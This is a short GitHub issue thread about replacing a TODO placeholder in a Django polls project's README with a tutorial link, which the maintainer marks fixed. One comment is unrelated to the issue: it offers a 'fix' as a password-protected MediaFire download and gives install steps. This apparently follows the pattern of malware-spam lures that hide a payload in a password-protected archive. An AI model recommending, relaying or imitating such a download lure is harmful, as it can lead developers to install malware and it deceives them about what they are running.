### ISSUE TITLE
update README.md and replace TODO with django tutorial link

### ISSUE THREAD

**Issue by Karczel** [NapatrSaengthongsakullert/ku-polls#6]
[Django Tutorial project](TODO-write-URL-of-the-django-tutorial-here)
in README.md line 4

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NapatrSaengthongsakullert** [comment]
**FIXED*
